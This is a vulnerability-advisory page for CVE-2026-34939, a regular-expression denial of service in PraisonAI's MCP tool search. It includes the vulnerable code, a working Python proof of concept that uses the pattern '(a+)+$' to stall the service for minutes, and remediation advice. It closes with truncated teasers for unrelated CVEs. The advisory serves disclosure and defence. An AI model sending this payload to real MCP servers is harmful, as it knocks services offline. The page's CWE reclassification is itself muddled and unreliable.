Python
CVE-2026-34939
MEDIUM
Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.
Details
tool_index.py:365 (source) -> tool_index.py:368 (sink)
# source -- query taken directly from caller, no validation
def search_tools(self, query: str) -> List[ToolInfo]:
import re
# sink -- compiled and applied with no timeout or exception handling
pattern = re.compile(query, re.IGNORECASE)
for tool in self.get_all_tools():
if pattern.search(tool.name) or pattern.search(tool.hint):
matches.append(tool)PoC
# tested on: praisonai==1.5.87 (source install)
# install: pip install -e src/praisonai
import sys, time, json
sys.path.insert(0, 'src/praisonai')
from pathlib import Path
mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server'
mcp_dir.mkdir(parents=True, exist_ok=True)
(mcp_dir / '_index.json').write_text(json.dumps([
{"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"}
]))
(mcp_dir / '_status.json').write_text(json.dumps({
"server": "test_server", "available": True, "auth_required": False,
"last_sync": time.time(), "tool_count": 1, "error": None
}))
from praisonai.mcp_server.tool_index import MCPToolIndex
index = MCPToolIndex()
start = time.monotonic()
results = index.search_tools("(a+)+$")
print(f"Returned in {time.monotonic() - start:.1f}s")
# expected output: Returned in 376.0sImpact
A single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.
AnalysisAI
Denial of service in PraisonAI's MCPToolIndex.search_tools() allows authenticated remote attackers to block the Python thread for hundreds of seconds via a crafted regular expression causing catastrophic backtracking. The vulnerable function compiles caller-supplied query strings directly as regex patterns without validation, timeout, or exception handling. A single malicious request can sustain complete service outage, and the MCP server HTTP transport runs without authentication by default, significantly lowering the practical barrier to exploitation despite the CVSS requiring PR:L.
Technical ContextAI
The vulnerability stems from unsafe regex compilation in Python's re module. When re.compile() processes a maliciously crafted pattern such as (a+)+$ against a string like thirty 'a' characters followed by '!', the regex engine enters catastrophic backtracking - exponential retry paths as quantified groups nest and fail to match. The root cause (CWE-1333: Improper Restriction of Rendered UI Layers or Frames) is actually a misclassification; this is fundamentally CWE-1256 (Regular Expression Denial of Service) or CWE-400 (Uncontrolled Resource Consumption). The Python re module lacks built-in backtracking limits; the standard library regex module offers timeouts via the timeout parameter, but the vulnerable code uses only the default re module. PraisonAI (pip package praisonai version 1.5.87 and earlier) integrates this in tool_index.py:365-368 where the search_tools() method accepts an untrusted query parameter and applies it directly without sanitization or resource limits.
RemediationAI
Apply vendor patch to sanitize or restrict regex input. The primary fix is to validate the query parameter before regex compilation: reject or escape regex metacharacters, implement a whitelist of allowed search patterns (e.g., simple string literals), or use a safe regex library with configurable backtracking limits (e.g., Python's regex module with timeout parameter). Immediate workaround: wrap the re.compile() and pattern.search() calls in a timeout using signal.alarm() on Unix systems or threading.Timer for cross-platform protection, allowing queries to abort after 1-5 seconds. For deployments: enable HTTP authentication in the MCP server configuration and restrict network access to the tool search endpoint. Users should upgrade to a patched version of PraisonAI once released. See the vendor advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f for confirmation and any released patch details.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-8w9j-hc3g-3g7f